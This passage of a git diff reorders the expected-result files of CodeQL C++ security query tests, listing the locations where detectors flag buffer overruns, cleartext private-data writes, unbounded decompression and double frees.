arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:15:9:15:11 | buf | buf | test.cpp:72:5:72:19 | Store: ... = ... | write | -| test.cpp:77:27:77:44 | PointerAdd: access to array | test.cpp:77:32:77:34 | buf | test.cpp:66:32:66:32 | p | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:15:9:15:11 | buf | buf | test.cpp:67:5:67:10 | Store: ... = ... | write | -| test.cpp:88:5:88:27 | PointerAdd: access to array | test.cpp:85:34:85:36 | buf | test.cpp:88:5:88:27 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:15:9:15:11 | buf | buf | test.cpp:88:5:88:31 | Store: ... = ... | write | -| test.cpp:128:9:128:14 | PointerAdd: access to array | test.cpp:128:9:128:11 | arr | test.cpp:128:9:128:14 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:125:11:125:13 | arr | arr | test.cpp:128:9:128:18 | Store: ... = ... | write | -| test.cpp:136:9:136:16 | PointerAdd: ... += ... | test.cpp:143:18:143:21 | asdf | test.cpp:138:13:138:15 | arr | This pointer arithmetic may have an off-by-2 error allowing it to overrun $@ at this $@. | test.cpp:142:10:142:13 | asdf | asdf | test.cpp:138:12:138:15 | Load: * ... | read | -| test.cpp:156:12:156:18 | PointerAdd: ... + ... | test.cpp:156:12:156:14 | buf | test.cpp:147:4:147:9 | -- ... | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:154:7:154:9 | buf | buf | test.cpp:147:3:147:13 | Store: ... = ... | write | -| test.cpp:156:12:156:18 | PointerAdd: ... + ... | test.cpp:156:12:156:14 | buf | test.cpp:147:4:147:9 | -- ... | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:154:7:154:9 | buf | buf | test.cpp:147:3:147:13 | Store: ... = ... | write | -| test.cpp:221:5:221:11 | PointerAdd: access to array | test.cpp:218:23:218:28 | buffer | test.cpp:221:5:221:11 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:217:19:217:24 | buffer | buffer | test.cpp:221:5:221:15 | Store: ... = ... | write | -| test.cpp:232:5:232:10 | PointerAdd: access to array | test.cpp:229:25:229:29 | array | test.cpp:232:5:232:10 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:228:10:228:14 | array | array | test.cpp:232:5:232:19 | Store: ... = ... | write | -| test.cpp:261:27:261:30 | PointerAdd: access to array | test.cpp:286:19:286:25 | buffer2 | test.cpp:261:27:261:30 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:285:19:285:25 | buffer2 | buffer2 | test.cpp:261:27:261:30 | Load: access to array | read | -| test.cpp:299:16:299:21 | PointerAdd: access to array | test.cpp:309:20:309:23 | arr2 | test.cpp:299:16:299:21 | access to array | This pointer arithmetic may have an off-by-1014 error allowing it to overrun $@ at this $@. | test.cpp:308:9:308:12 | arr2 | arr2 | test.cpp:299:16:299:21 | Load: access to array | read | -| test.cpp:322:19:322:27 | PointerAdd: ... + ... | test.cpp:322:19:322:22 | temp | test.cpp:325:24:325:26 | end | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:314:10:314:13 | temp | temp | test.cpp:330:13:330:24 | Store: ... = ... | write | -| test.cpp:322:19:322:27 | PointerAdd: ... + ... | test.cpp:322:19:322:22 | temp | test.cpp:325:24:325:26 | end | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:314:10:314:13 | temp | temp | test.cpp:331:13:331:24 | Store: ... = ... | write | -| test.cpp:322:19:322:27 | PointerAdd: ... + ... | test.cpp:322:19:322:22 | temp | test.cpp:325:24:325:26 | end | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:314:10:314:13 | temp | temp | test.cpp:333:13:333:24 | Store: ... = ... | write | edges | test.cpp:34:10:34:12 | buf | test.cpp:34:5:34:24 | access to array | provenance | Config | | test.cpp:35:10:35:12 | buf | test.cpp:35:5:35:22 | access to array | provenance | Config | @@ -200,3 +178,25 @@ nodes | test.cpp:325:24:325:26 | end | semmle.label | end | | test.cpp:325:24:325:26 | end | semmle.label | end | subpaths +#select +| test.cpp:35:5:35:22 | PointerAdd: access to array | test.cpp:35:10:35:12 | buf | test.cpp:35:5:35:22 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:15:9:15:11 | buf | buf | test.cpp:35:5:35:26 | Store: ... = ... | write | +| test.cpp:36:5:36:24 | PointerAdd: access to array | test.cpp:36:10:36:12 | buf | test.cpp:36:5:36:24 | access to array | This pointer arithmetic may have an off-by-2 error allowing it to overrun $@ at this $@. | test.cpp:15:9:15:11 | buf | buf | test.cpp:36:5:36:28 | Store: ... = ... | write | +| test.cpp:43:9:43:19 | PointerAdd: access to array | test.cpp:43:14:43:16 | buf | test.cpp:43:9:43:19 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:15:9:15:11 | buf | buf | test.cpp:43:9:43:23 | Store: ... = ... | write | +| test.cpp:49:5:49:22 | PointerAdd: access to array | test.cpp:49:10:49:12 | buf | test.cpp:49:5:49:22 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:19:9:19:11 | buf | buf | test.cpp:49:5:49:26 | Store: ... = ... | write | +| test.cpp:50:5:50:24 | PointerAdd: access to array | test.cpp:50:10:50:12 | buf | test.cpp:50:5:50:24 | access to array | This pointer arithmetic may have an off-by-2 error allowing it to overrun $@ at this $@. | test.cpp:19:9:19:11 | buf | buf | test.cpp:50:5:50:28 | Store: ... = ... | write | +| test.cpp:57:9:57:19 | PointerAdd: access to array | test.cpp:57:14:57:16 | buf | test.cpp:57:9:57:19 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:19:9:19:11 | buf | buf | test.cpp:57:9:57:23 | Store: ... = ... | write | +| test.cpp:61:9:61:19 | PointerAdd: access to array | test.cpp:61:14:61:16 | buf | test.cpp:61:9:61:19 | access to array | This pointer arithmetic may have an off-by-2 error allowing it to overrun $@ at this $@. | test.cpp:19:9:19:11 | buf | buf | test.cpp:61:9:61:23 | Store: ... = ... | write | +| test.cpp:72:5:72:15 | PointerAdd: access to array | test.cpp:79:32:79:34 | buf | test.cpp:72:5:72:15 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:15:9:15:11 | buf | buf | test.cpp:72:5:72:19 | Store: ... = ... | write | +| test.cpp:77:27:77:44 | PointerAdd: access to array | test.cpp:77:32:77:34 | buf | test.cpp:66:32:66:32 | p | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:15:9:15:11 | buf | buf | test.cpp:67:5:67:10 | Store: ... = ... | write | +| test.cpp:88:5:88:27 | PointerAdd: access to array | test.cpp:85:34:85:36 | buf | test.cpp:88:5:88:27 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:15:9:15:11 | buf | buf | test.cpp:88:5:88:31 | Store: ... = ... | write | +| test.cpp:128:9:128:14 | PointerAdd: access to array | test.cpp:128:9:128:11 | arr | test.cpp:128:9:128:14 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:125:11:125:13 | arr | arr | test.cpp:128:9:128:18 | Store: ... = ... | write | +| test.cpp:136:9:136:16 | PointerAdd: ... += ... | test.cpp:143:18:143:21 | asdf | test.cpp:138:13:138:15 | arr | This pointer arithmetic may have an off-by-2 error allowing it to overrun $@ at this $@. | test.cpp:142:10:142:13 | asdf | asdf | test.cpp:138:12:138:15 | Load: * ... | read | +| test.cpp:156:12:156:18 | PointerAdd: ... + ... | test.cpp:156:12:156:14 | buf | test.cpp:147:4:147:9 | -- ... | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:154:7:154:9 | buf | buf | test.cpp:147:3:147:13 | Store: ... = ... | write | +| test.cpp:156:12:156:18 | PointerAdd: ... + ... | test.cpp:156:12:156:14 | buf | test.cpp:147:4:147:9 | -- ... | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:154:7:154:9 | buf | buf | test.cpp:147:3:147:13 | Store: ... = ... | write | +| test.cpp:221:5:221:11 | PointerAdd: access to array | test.cpp:218:23:218:28 | buffer | test.cpp:221:5:221:11 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:217:19:217:24 | buffer | buffer | test.cpp:221:5:221:15 | Store: ... = ... | write | +| test.cpp:232:5:232:10 | PointerAdd: access to array | test.cpp:229:25:229:29 | array | test.cpp:232:5:232:10 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:228:10:228:14 | array | array | test.cpp:232:5:232:19 | Store: ... = ... | write | +| test.cpp:261:27:261:30 | PointerAdd: access to array | test.cpp:286:19:286:25 | buffer2 | test.cpp:261:27:261:30 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:285:19:285:25 | buffer2 | buffer2 | test.cpp:261:27:261:30 | Load: access to array | read | +| test.cpp:299:16:299:21 | PointerAdd: access to array | test.cpp:309:20:309:23 | arr2 | test.cpp:299:16:299:21 | access to array | This pointer arithmetic may have an off-by-1014 error allowing it to overrun $@ at this $@. | test.cpp:308:9:308:12 | arr2 | arr2 | test.cpp:299:16:299:21 | Load: access to array | read | +| test.cpp:322:19:322:27 | PointerAdd: ... + ... | test.cpp:322:19:322:22 | temp | test.cpp:325:24:325:26 | end | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:314:10:314:13 | temp | temp | test.cpp:330:13:330:24 | Store: ... = ... | write | +| test.cpp:322:19:322:27 | PointerAdd: ... + ... | test.cpp:322:19:322:22 | temp | test.cpp:325:24:325:26 | end | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:314:10:314:13 | temp | temp | test.cpp:331:13:331:24 | Store: ... = ... | write | +| test.cpp:322:19:322:27 | PointerAdd: ... + ... | test.cpp:322:19:322:22 | temp | test.cpp:325:24:325:26 | end | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:314:10:314:13 | temp | temp | test.cpp:333:13:333:24 | Store: ... = ... | write | diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-359/semmle/tests/PrivateCleartextWrite.expected b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-359/semmle/tests/PrivateCleartextWrite.expected index 99a27a469894..df8b26486f32 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-359/semmle/tests/PrivateCleartextWrite.expected +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-359/semmle/tests/PrivateCleartextWrite.expected @@ -1,15 +1,3 @@ -#select -| test.cpp:57:9:57:18 | theZipcode | test.cpp:57:9:57:18 | theZipcode | test.cpp:57:9:57:18 | theZipcode | This write into the external location 'theZipcode' may contain unencrypted data from $@. | test.cpp:57:9:57:18 | theZipcode | this source of private data. | -| test.cpp:74:24:74:30 | medical | test.cpp:74:24:74:30 | medical | test.cpp:74:24:74:30 | medical | This write into the external location 'medical' may contain unencrypted data from $@. | test.cpp:74:24:74:30 | medical | this source of private data. | -| test.cpp:78:24:78:27 | temp | test.cpp:74:24:74:30 | medical | test.cpp:78:24:78:27 | temp | This write into the external location 'temp' may contain unencrypted data from $@. | test.cpp:74:24:74:30 | medical | this source of private data. | -| test.cpp:78:24:78:27 | temp | test.cpp:77:16:77:22 | medical | test.cpp:78:24:78:27 | temp | This write into the external location 'temp' may contain unencrypted data from $@. | test.cpp:77:16:77:22 | medical | this source of private data. | -| test.cpp:82:24:82:28 | buff5 | test.cpp:74:24:74:30 | medical | test.cpp:82:24:82:28 | buff5 | This write into the external location 'buff5' may contain unencrypted data from $@. | test.cpp:74:24:74:30 | medical | this source of private data. | -| test.cpp:82:24:82:28 | buff5 | test.cpp:77:16:77:22 | medical | test.cpp:82:24:82:28 | buff5 | This write into the external location 'buff5' may contain unencrypted data from $@. | test.cpp:77:16:77:22 | medical | this source of private data. | -| test.cpp:82:24:82:28 | buff5 | test.cpp:81:22:81:28 | medical | test.cpp:82:24:82:28 | buff5 | This write into the external location 'buff5' may contain unencrypted data from $@. | test.cpp:81:22:81:28 | medical | this source of private data. | -| test.cpp:96:37:96:46 | theZipcode | test.cpp:96:37:96:46 | theZipcode | test.cpp:96:37:96:46 | theZipcode | This write into the external location 'theZipcode' may contain unencrypted data from $@. | test.cpp:96:37:96:46 | theZipcode | this source of private data. | -| test.cpp:99:42:99:51 | theZipcode | test.cpp:96:37:96:46 | theZipcode | test.cpp:99:42:99:51 | theZipcode | This write into the external location 'theZipcode' may contain unencrypted data from $@. | test.cpp:96:37:96:46 | theZipcode | this source of private data. | -| test.cpp:99:42:99:51 | theZipcode | test.cpp:99:42:99:51 | theZipcode | test.cpp:99:42:99:51 | theZipcode | This write into the external location 'theZipcode' may contain unencrypted data from $@. | test.cpp:99:42:99:51 | theZipcode | this source of private data. | -| test.cpp:99:42:99:51 | theZipcode | test.cpp:99:61:99:70 | theZipcode | test.cpp:99:42:99:51 | theZipcode | This write into the external location 'theZipcode' may contain unencrypted data from $@. | test.cpp:99:61:99:70 | theZipcode | this source of private data. | edges | test.cpp:45:18:45:23 | buffer | test.cpp:47:10:47:15 | buffer | provenance | | | test.cpp:47:10:47:15 | buffer | test.cpp:45:7:45:10 | *func | provenance | | @@ -44,3 +32,15 @@ nodes | test.cpp:99:61:99:70 | theZipcode | semmle.label | theZipcode | subpaths | test.cpp:81:22:81:28 | medical | test.cpp:45:18:45:23 | buffer | test.cpp:45:7:45:10 | *func | test.cpp:81:17:81:20 | call to func | +#select +| test.cpp:57:9:57:18 | theZipcode | test.cpp:57:9:57:18 | theZipcode | test.cpp:57:9:57:18 | theZipcode | This write into the external location 'theZipcode' may contain unencrypted data from $@. | test.cpp:57:9:57:18 | theZipcode | this source of private data. | +| test.cpp:74:24:74:30 | medical | test.cpp:74:24:74:30 | medical | test.cpp:74:24:74:30 | medical | This write into the external location 'medical' may contain unencrypted data from $@. | test.cpp:74:24:74:30 | medical | this source of private data. | +| test.cpp:78:24:78:27 | temp | test.cpp:74:24:74:30 | medical | test.cpp:78:24:78:27 | temp | This write into the external location 'temp' may contain unencrypted data from $@. | test.cpp:74:24:74:30 | medical | this source of private data. | +| test.cpp:78:24:78:27 | temp | test.cpp:77:16:77:22 | medical | test.cpp:78:24:78:27 | temp | This write into the external location 'temp' may contain unencrypted data from $@. | test.cpp:77:16:77:22 | medical | this source of private data. | +| test.cpp:82:24:82:28 | buff5 | test.cpp:74:24:74:30 | medical | test.cpp:82:24:82:28 | buff5 | This write into the external location 'buff5' may contain unencrypted data from $@. | test.cpp:74:24:74:30 | medical | this source of private data. | +| test.cpp:82:24:82:28 | buff5 | test.cpp:77:16:77:22 | medical | test.cpp:82:24:82:28 | buff5 | This write into the external location 'buff5' may contain unencrypted data from $@. | test.cpp:77:16:77:22 | medical | this source of private data. | +| test.cpp:82:24:82:28 | buff5 | test.cpp:81:22:81:28 | medical | test.cpp:82:24:82:28 | buff5 | This write into the external location 'buff5' may contain unencrypted data from $@. | test.cpp:81:22:81:28 | medical | this source of private data. | +| test.cpp:96:37:96:46 | theZipcode | test.cpp:96:37:96:46 | theZipcode | test.cpp:96:37:96:46 | theZipcode | This write into the external location 'theZipcode' may contain unencrypted data from $@. | test.cpp:96:37:96:46 | theZipcode | this source of private data. | +| test.cpp:99:42:99:51 | theZipcode | test.cpp:96:37:96:46 | theZipcode | test.cpp:99:42:99:51 | theZipcode | This write into the external location 'theZipcode' may contain unencrypted data from $@. | test.cpp:96:37:96:46 | theZipcode | this source of private data. | +| test.cpp:99:42:99:51 | theZipcode | test.cpp:99:42:99:51 | theZipcode | test.cpp:99:42:99:51 | theZipcode | This write into the external location 'theZipcode' may contain unencrypted data from $@. | test.cpp:99:42:99:51 | theZipcode | this source of private data. | +| test.cpp:99:42:99:51 | theZipcode | test.cpp:99:61:99:70 | theZipcode | test.cpp:99:42:99:51 | theZipcode | This write into the external location 'theZipcode' may contain unencrypted data from $@. | test.cpp:99:61:99:70 | theZipcode | this source of private data. | diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/DecompressionBombs.expected b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/DecompressionBombs.expected index 363b2aafa0fa..b813f8532cb7 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/DecompressionBombs.expected +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/DecompressionBombs.expected @@ -1,17 +1,3 @@ -#select -| brotliTest.cpp:18:35:18:53 | *access to array | main.cpp:7:33:7:36 | **argv | brotliTest.cpp:18:35:18:53 | *access to array | The decompression output of $@ is not limited | brotliTest.cpp:18:5:18:27 | call to BrotliDecoderDecompress | BrotliDecoderDecompress | -| brotliTest.cpp:24:51:24:58 | **& ... | main.cpp:7:33:7:36 | **argv | brotliTest.cpp:24:51:24:58 | **& ... | The decompression output of $@ is not limited | brotliTest.cpp:24:5:24:33 | call to BrotliDecoderDecompressStream | BrotliDecoderDecompressStream | -| libarchiveTests.cpp:22:41:22:42 | *ar | main.cpp:7:33:7:36 | **argv | libarchiveTests.cpp:22:41:22:42 | *ar | The decompression output of $@ is not limited | libarchiveTests.cpp:22:17:22:39 | call to archive_read_data_block | archive_read_data_block | -| minizipTest.cpp:17:52:17:67 | *access to array | main.cpp:7:33:7:36 | **argv | minizipTest.cpp:17:52:17:67 | *access to array | The decompression output of $@ is not limited | minizipTest.cpp:17:22:17:38 | call to mz_zip_entry_read | mz_zip_entry_read | -| minizipTest.cpp:26:30:26:39 | **zip_reader | main.cpp:7:33:7:36 | **argv | minizipTest.cpp:26:30:26:39 | **zip_reader | The decompression output of $@ is not limited | minizipTest.cpp:26:5:26:28 | call to mz_zip_reader_entry_save | mz_zip_reader_entry_save | -| minizipTest.cpp:26:30:26:39 | *zip_reader | main.cpp:7:33:7:36 | **argv | minizipTest.cpp:26:30:26:39 | *zip_reader | The decompression output of $@ is not limited | minizipTest.cpp:26:5:26:28 | call to mz_zip_reader_entry_save | mz_zip_reader_entry_save | -| minizipTest.cpp:28:13:28:19 | *access to array | main.cpp:7:33:7:36 | **argv | minizipTest.cpp:28:13:28:19 | *access to array | The decompression output of $@ is not limited | minizipTest.cpp:28:5:28:11 | call to UnzOpen | UnzOpen | -| zlibTest.cpp:25:13:25:22 | & ... | main.cpp:7:33:7:36 | **argv | zlibTest.cpp:25:13:25:22 | & ... | The decompression output of $@ is not limited | zlibTest.cpp:25:5:25:11 | call to inflate | inflate | -| zlibTest.cpp:41:20:41:26 | inFileZ | main.cpp:7:33:7:36 | **argv | zlibTest.cpp:41:20:41:26 | inFileZ | The decompression output of $@ is not limited | zlibTest.cpp:41:13:41:18 | call to gzread | gzread | -| zlibTest.cpp:51:38:51:44 | inFileZ | main.cpp:7:33:7:36 | **argv | zlibTest.cpp:51:38:51:44 | inFileZ | The decompression output of $@ is not limited | zlibTest.cpp:51:14:51:20 | call to gzfread | gzfread | -| zlibTest.cpp:62:25:62:31 | inFileZ | main.cpp:7:33:7:36 | **argv | zlibTest.cpp:62:25:62:31 | inFileZ | The decompression output of $@ is not limited | zlibTest.cpp:62:18:62:23 | call to gzgets | gzgets | -| zlibTest.cpp:77:45:77:59 | *input | main.cpp:7:33:7:36 | **argv | zlibTest.cpp:77:45:77:59 | *input | The decompression output of $@ is not limited | zlibTest.cpp:77:5:77:14 | call to uncompress | uncompress | -| zstdTest.cpp:39:69:39:74 | & ... | main.cpp:7:33:7:36 | **argv | zstdTest.cpp:39:69:39:74 | & ... | The decompression output of $@ is not limited | zstdTest.cpp:39:32:39:52 | call to ZSTD_decompressStream | ZSTD_decompressStream | edges | brotliTest.cpp:15:41:15:44 | **argv | brotliTest.cpp:15:41:15:44 | **argv | provenance | | | brotliTest.cpp:15:41:15:44 | **argv | brotliTest.cpp:18:35:18:53 | *access to array | provenance | | @@ -228,3 +214,17 @@ subpaths | zlibTest.cpp:83:19:83:25 | *access to array | zlibTest.cpp:16:26:16:30 | *input | zlibTest.cpp:16:26:16:30 | *input | zlibTest.cpp:83:19:83:25 | UnsafeInflate output argument | | zlibTest.cpp:84:18:84:24 | *access to array | zlibTest.cpp:37:25:37:32 | *fileName | zlibTest.cpp:37:25:37:32 | *fileName | zlibTest.cpp:84:18:84:24 | UnsafeGzread output argument | | zlibTest.cpp:85:19:85:25 | *access to array | zlibTest.cpp:71:26:71:30 | *input | zlibTest.cpp:71:26:71:30 | *input | zlibTest.cpp:85:19:85:25 | InflateString output argument | +#select +| brotliTest.cpp:18:35:18:53 | *access to array | main.cpp:7:33:7:36 | **argv | brotliTest.cpp:18:35:18:53 | *access to array | The decompression output of $@ is not limited | brotliTest.cpp:18:5:18:27 | call to BrotliDecoderDecompress | BrotliDecoderDecompress | +| brotliTest.cpp:24:51:24:58 | **& ... | main.cpp:7:33:7:36 | **argv | brotliTest.cpp:24:51:24:58 | **& ... | The decompression output of $@ is not limited | brotliTest.cpp:24:5:24:33 | call to BrotliDecoderDecompressStream | BrotliDecoderDecompressStream | +| libarchiveTests.cpp:22:41:22:42 | *ar | main.cpp:7:33:7:36 | **argv | libarchiveTests.cpp:22:41:22:42 | *ar | The decompression output of $@ is not limited | libarchiveTests.cpp:22:17:22:39 | call to archive_read_data_block | archive_read_data_block | +| minizipTest.cpp:17:52:17:67 | *access to array | main.cpp:7:33:7:36 | **argv | minizipTest.cpp:17:52:17:67 | *access to array | The decompression output of $@ is not limited | minizipTest.cpp:17:22:17:38 | call to mz_zip_entry_read | mz_zip_entry_read | +| minizipTest.cpp:26:30:26:39 | **zip_reader | main.cpp:7:33:7:36 | **argv | minizipTest.cpp:26:30:26:39 | **zip_reader | The decompression output of $@ is not limited | minizipTest.cpp:26:5:26:28 | call to mz_zip_reader_entry_save | mz_zip_reader_entry_save | +| minizipTest.cpp:26:30:26:39 | *zip_reader | main.cpp:7:33:7:36 | **argv | minizipTest.cpp:26:30:26:39 | *zip_reader | The decompression output of $@ is not limited | minizipTest.cpp:26:5:26:28 | call to mz_zip_reader_entry_save | mz_zip_reader_entry_save | +| minizipTest.cpp:28:13:28:19 | *access to array | main.cpp:7:33:7:36 | **argv | minizipTest.cpp:28:13:28:19 | *access to array | The decompression output of $@ is not limited | minizipTest.cpp:28:5:28:11 | call to UnzOpen | UnzOpen | +| zlibTest.cpp:25:13:25:22 | & ... | main.cpp:7:33:7:36 | **argv | zlibTest.cpp:25:13:25:22 | & ... | The decompression output of $@ is not limited | zlibTest.cpp:25:5:25:11 | call to inflate | inflate | +| zlibTest.cpp:41:20:41:26 | inFileZ | main.cpp:7:33:7:36 | **argv | zlibTest.cpp:41:20:41:26 | inFileZ | The decompression output of $@ is not limited | zlibTest.cpp:41:13:41:18 | call to gzread | gzread | +| zlibTest.cpp:51:38:51:44 | inFileZ | main.cpp:7:33:7:36 | **argv | zlibTest.cpp:51:38:51:44 | inFileZ | The decompression output of $@ is not limited | zlibTest.cpp:51:14:51:20 | call to gzfread | gzfread | +| zlibTest.cpp:62:25:62:31 | inFileZ | main.cpp:7:33:7:36 | **argv | zlibTest.cpp:62:25:62:31 | inFileZ | The decompression output of $@ is not limited | zlibTest.cpp:62:18:62:23 | call to gzgets | gzgets | +| zlibTest.cpp:77:45:77:59 | *input | main.cpp:7:33:7:36 | **argv | zlibTest.cpp:77:45:77:59 | *input | The decompression output of $@ is not limited | zlibTest.cpp:77:5:77:14 | call to uncompress | uncompress | +| zstdTest.cpp:39:69:39:74 | & ... | main.cpp:7:33:7:36 | **argv | zstdTest.cpp:39:69:39:74 | & ... | The decompression output of $@ is not limited | zstdTest.cpp:39:32:39:52 | call to ZSTD_decompressStream | ZSTD_decompressStream | diff --git a/cpp/ql/test/library-tests/name_qualifiers/NameQualifiers1.expected b/cpp/ql/test/library-tests/name_qualifiers/NameQualifiers1.expected index 72d7d615c815..b5f2fe8dd744 100644 --- a/cpp/ql/test/library-tests/name_qualifiers/NameQualifiers1.expected +++ b/cpp/ql/test/library-tests/name_qualifiers/NameQualifiers1.expected @@ -1,3 +1,7 @@ +| inconsistency2.cpp:3:3:3:5 | T:: | inconsistency2.cpp:3:3:3:6 | x | inconsistency2.cpp:2:20:2:20 | T | +| inconsistency2.cpp:3:3:3:11 | const s:: | inconsistency2.cpp:3:3:3:6 | x | file://:0:0:0:0 | const s | +| inconsistency.cpp:7:20:7:22 | S:: | inconsistency.cpp:7:20:7:23 | (int)... | inconsistency.cpp:4:8:4:8 | S | +| inconsistency.cpp:7:20:7:22 | S:: | inconsistency.cpp:7:20:7:23 | A | inconsistency.cpp:4:8:4:8 | S | | name_qualifiers.cpp:29:7:29:8 | :: | name_qualifiers.cpp:29:7:29:9 | x | file://:0:0:0:0 | (global namespace) | | name_qualifiers.cpp:31:7:31:10 | N1:: | name_qualifiers.cpp:31:7:31:12 | nx | name_qualifiers.cpp:4:11:4:12 | N1 | | name_qualifiers.cpp:34:7:34:8 | :: | name_qualifiers.cpp:34:9:34:12 | N1:: | file://:0:0:0:0 | (global namespace) | diff --git a/cpp/ql/test/query-tests/Critical/MemoryFreed/DoubleFree.expected b/cpp/ql/test/query-tests/Critical/MemoryFreed/DoubleFree.expected index 290b5d8a9917..9636f170e0be 100644 --- a/cpp/ql/test/query-tests/Critical/MemoryFreed/DoubleFree.expected +++ b/cpp/ql/test/query-tests/Critical/MemoryFreed/DoubleFree.expected @@ -1,18 +1,3 @@ -#select -| test_free.cpp:14:10:14:10 | a | test_free.cpp:11:10:11:10 | pointer to free output argument | test_free.cpp:14:10:14:10 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:14:10:14:10 | a | a | test_free.cpp:11:5:11:8 | call to free | call to free | -| test_free.cpp:31:27:31:27 | a | test_free.cpp:30:10:30:10 | pointer to free output argument | test_free.cpp:31:27:31:27 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:31:27:31:27 | a | a | test_free.cpp:30:5:30:8 | call to free | call to free | -| test_free.cpp:37:27:37:27 | a | test_free.cpp:35:10:35:10 | pointer to free output argument | test_free.cpp:37:27:37:27 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:37:27:37:27 | a | a | test_free.cpp:35:5:35:8 | call to free | call to free | -| test_free.cpp:46:10:46:10 | a | test_free.cpp:42:27:42:27 | pointer to free output argument | test_free.cpp:46:10:46:10 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:46:10:46:10 | a | a | test_free.cpp:42:22:42:25 | call to free | call to free | -| test_free.cpp:46:10:46:10 | a | test_free.cpp:44:27:44:27 | pointer to free output argument | test_free.cpp:46:10:46:10 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:46:10:46:10 | a | a | test_free.cpp:44:22:44:25 | call to free | call to free | -| test_free.cpp:51:10:51:10 | a | test_free.cpp:50:27:50:27 | pointer to free output argument | test_free.cpp:51:10:51:10 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:51:10:51:10 | a | a | test_free.cpp:50:22:50:25 | call to free | call to free | -| test_free.cpp:72:14:72:14 | a | test_free.cpp:69:10:69:10 | pointer to free output argument | test_free.cpp:72:14:72:14 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:72:14:72:14 | a | a | test_free.cpp:69:5:69:8 | call to free | call to free | -| test_free.cpp:85:12:85:12 | a | test_free.cpp:83:12:83:12 | pointer to operator delete output argument | test_free.cpp:85:12:85:12 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:85:12:85:12 | a | a | test_free.cpp:83:5:83:13 | delete | delete | -| test_free.cpp:103:10:103:10 | a | test_free.cpp:101:10:101:10 | pointer to free output argument | test_free.cpp:103:10:103:10 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:103:10:103:10 | a | a | test_free.cpp:101:5:101:8 | call to free | call to free | -| test_free.cpp:129:10:129:11 | * ... | test_free.cpp:128:10:128:11 | pointer to free output argument | test_free.cpp:129:10:129:11 | * ... | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:129:10:129:11 | * ... | * ... | test_free.cpp:128:5:128:8 | call to free | call to free | -| test_free.cpp:154:10:154:10 | a | test_free.cpp:152:27:152:27 | pointer to free output argument | test_free.cpp:154:10:154:10 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:154:10:154:10 | a | a | test_free.cpp:152:22:152:25 | call to free | call to free | -| test_free.cpp:209:10:209:10 | a | test_free.cpp:207:10:207:10 | pointer to free output argument | test_free.cpp:209:10:209:10 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:209:10:209:10 | a | a | test_free.cpp:207:5:207:8 | call to free | call to free | -| test_free.cpp:302:12:302:14 | buf | test_free.cpp:301:12:301:14 | pointer to g_free output argument | test_free.cpp:302:12:302:14 | buf | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:302:12:302:14 | buf | buf | test_free.cpp:301:5:301:10 | call to g_free | call to g_free | -| test_free.cpp:322:12:322:12 | a | test_free.cpp:319:16:319:16 | pointer to operator delete output argument | test_free.cpp:322:12:322:12 | a | Memory pointed to by $@ may already have been freed by $@. | test_free.cpp:322:12:322:12 | a | a | test_free.cpp:319:9:319:16 | delete | delete | edges | test_free.cpp:11:10:11:10 | pointer to free 